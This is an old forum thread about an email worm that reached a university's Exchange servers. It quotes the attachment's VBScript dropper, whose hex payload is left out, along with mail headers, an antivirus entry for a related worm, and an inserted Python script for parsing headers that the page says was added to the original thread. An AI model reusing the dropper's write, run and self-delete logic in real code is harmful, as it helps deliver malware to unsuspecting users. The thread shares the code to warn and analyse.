Email Virus attacked NUS exchange server......
Author: 有话想说 (Level 6 - Seasoned, posts: 16666) Posted: 2003-04-28 22:43:02  Original post
Email Virus attacked NUS exchange server......
The email contains such an HTML attachment:

Please wait...
<script language='vbscript'>
on error resume next
set a=createobject("wscript.shell")
set b=createobject("scripting.filesystemobject")
co=0
if (err.number<>0) then
co=1
window.open(document.location.pathname)
end if
set c=b.getspecialfolder(2)
d=replace(document.location.pathname,"%20"," ")
e=c &"\temp.exe"
<several kilobytes omitted here: the contents of the temp.exe file>
set f=b.createtextfile(e,true)
f.write h(g)
f.close
a.run e,false
window.settimeout "b.deletefile d,true",500
window.settimeout "window.close",500
function h(st)
for i=1 to len(st) step 2
h=h & chr("&h"&mid(st,i,2))
next
end function </script><html>Tinh` cho khong bieu' khong</html>
Author: 有话想说 (Level 6 - Seasoned, posts: 16666) Posted: 2003-04-28 22:57:33  #2
mail header
Received: from mbxsrv26.stu.nus.edu.sg ([137.132.14.225]) by mbxsrv25.stu.nus.edu.sg with Microsoft SMTPSVC(5.0.2195.5329);
Mon, 28 Apr 2003 22:38:34 +0800
Received: from ims01.stf.nus.edu.sg ([137.132.14.208]) by mbxsrv26.stu.nus.edu.sg with Microsoft SMTPSVC(5.0.2195.5329);
Mon, 28 Apr 2003 22:34:40 +0800
Received: from isv01.stf.nus.edu.sg ([137.132.14.19]) by ims01.stf.nus.edu.sg with Microsoft SMTPSVC(5.0.2195.5329);
Mon, 28 Apr 2003 22:30:04 +0800
Received: from leonis.nus.edu.sg ([137.132.1.18]) by isv01.stf.nus.edu.sg with InterScan Messaging Security Suite for SMTP; Mon, 28 Apr 2003 22:30:02 +0800
Received: from jx (209-120.priv19.nus.edu.sg [172.19.209.120])
by leonis.nus.edu.sg (8.12.9/8.12.9) with SMTP id h3SEVO2s010648
for <NUSStudents@nus.edu.sg>; Mon, 28 Apr 2003 22:31:25 +0800 (SGT)
Date: Mon, 28 Apr 2003 22:31:24 +0800 (SGT)
Message-Id: <200304281431.h3SEVO2s010648@leonis.nus.edu.sg>
From: "uprbox1"<uprbox1@nus.edu.sg>
To: NUSStudents@nus.edu.sg
Subject: HELP??-
Reply-To: uprbox1@nus.edu.sg
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"
Return-Path: uprbox1@nus.edu.sg
X-OriginalArrivalTime: 28 Apr 2003 14:30:04.0445 (UTC) FILETIME=[A8C624D0:01C30D92]
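
Reading the Received chain in the headers above from the bottom up, as an added example that is not part of the original post: each relay prepends its own line, so the lowest line is the first hop. The function names `parse_hops` and `analyse` are assumptions made for this sketch, and the header lines are the page's own, joined onto one line each.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# The five Received lines from the post above, one per line (topmost = newest hop).
RAW = """\
Received: from mbxsrv26.stu.nus.edu.sg ([137.132.14.225]) by mbxsrv25.stu.nus.edu.sg with Microsoft SMTPSVC(5.0.2195.5329); Mon, 28 Apr 2003 22:38:34 +0800
Received: from ims01.stf.nus.edu.sg ([137.132.14.208]) by mbxsrv26.stu.nus.edu.sg with Microsoft SMTPSVC(5.0.2195.5329); Mon, 28 Apr 2003 22:34:40 +0800
Received: from isv01.stf.nus.edu.sg ([137.132.14.19]) by ims01.stf.nus.edu.sg with Microsoft SMTPSVC(5.0.2195.5329); Mon, 28 Apr 2003 22:30:04 +0800
Received: from leonis.nus.edu.sg ([137.132.1.18]) by isv01.stf.nus.edu.sg with InterScan Messaging Security Suite for SMTP; Mon, 28 Apr 2003 22:30:02 +0800
Received: from jx (209-120.priv19.nus.edu.sg [172.19.209.120]) by leonis.nus.edu.sg (8.12.9/8.12.9) with SMTP id h3SEVO2s010648 for <NUSStudents@nus.edu.sg>; Mon, 28 Apr 2003 22:31:25 +0800 (SGT)
"""

def _first(pattern, text):
    m = re.search(pattern, text)
    return m.group(1) if m else None

def parse_hops(raw):
    """Return the relay hops oldest-first (hypothetical helper for this example)."""
    hops = []
    for value in reversed(message_from_string(raw).get_all("Received", [])):
        info, _, stamp = value.rpartition(";")
        ip = _first(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", info)
        hops.append({
            "from": _first(r"from\s+(\S+)", info),           # name the client claimed
            "ip": ipaddress.ip_address(ip) if ip else None,  # address the server saw
            "by": _first(r"\bby\s+(\S+)", info),             # server that wrote the line
            "time": parsedate_to_datetime(re.sub(r"\(.*?\)", "", stamp).strip()),
        })
    return hops

def analyse(hops):
    origin = hops[0]
    # A hop stamped earlier than the previous one means the two servers' clocks
    # disagree, so per-hop delays across that pair cannot be trusted.
    skew = [(a["by"], b["by"]) for a, b in zip(hops, hops[1:]) if b["time"] < a["time"]]
    return {
        "origin_host": origin["from"],
        "origin_ip": str(origin["ip"]),
        "origin_is_private": bool(origin["ip"] and origin["ip"].is_private),
        "first_relay": origin["by"],
        "end_to_end_seconds": (hops[-1]["time"] - origin["time"]).total_seconds(),
        "clock_skew_between": skew,
    }

if __name__ == "__main__":
    for key, value in analyse(parse_hops(RAW)).items():
        print(f"{key}: {value}")
```

On these headers it reports the first hop as host `jx` at 172.19.209.120, a private-range address, handing the message to leonis.nus.edu.sg, and it flags that isv01 stamped its hop earlier than leonis did.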

Author: 有话想说 (Level 6 - Seasoned, posts: 16666) Posted: 2003-04-28 23:21:07  #3
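Virus description >>>>> This virus is a variant of the following virus
------------------------
Virus name: VBS/VBSWG.X.Worm
Alias:
Virus type: Worm
Characteristics: VBS/VBSWG.X.Worm is a worm that spreads by email. It can send infected mail to everyone in the address book and opens a website with pornographic content.
Description: The infected email has the subject "Homepage" and the body "Hi! You've got to see this page! It's really cool ;O)". The attachment is the worm itself: "HOMEPAGE.HTML.VBS". When the attachment is run, the worm is activated and sends infected mail to every address in the address book. The virus copies itself to the system Temp directory and modifies the registry: HKEY_CURRENT_USER\Software\An\mailed, setting the value to 1. After that, the worm searches the mailbox for mails with the subject "Homepage" and deletes them.
Solution: Kill version 23.44 and above can detect VBS/VBSWG.X.Worm. All files detected as infected with VBS/VBSWG.X.Worm must be deleted, either manually or by configuring Kill to delete them directly.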
It is not this one..... definitely......
It is a new virus, the main harm is to attack the MS Exchange servers, and pay load onto it..... (from current observations)

The virus has been submitted to SARC (Symantec AntiVirus Research Center) just now......

Author: 有话想说 (Level 6 - Seasoned, posts: 16666) Posted: 2003-04-28 23:21:56  #4
Any harm? Mailbox bomber?
Seems an Exchange server virus.....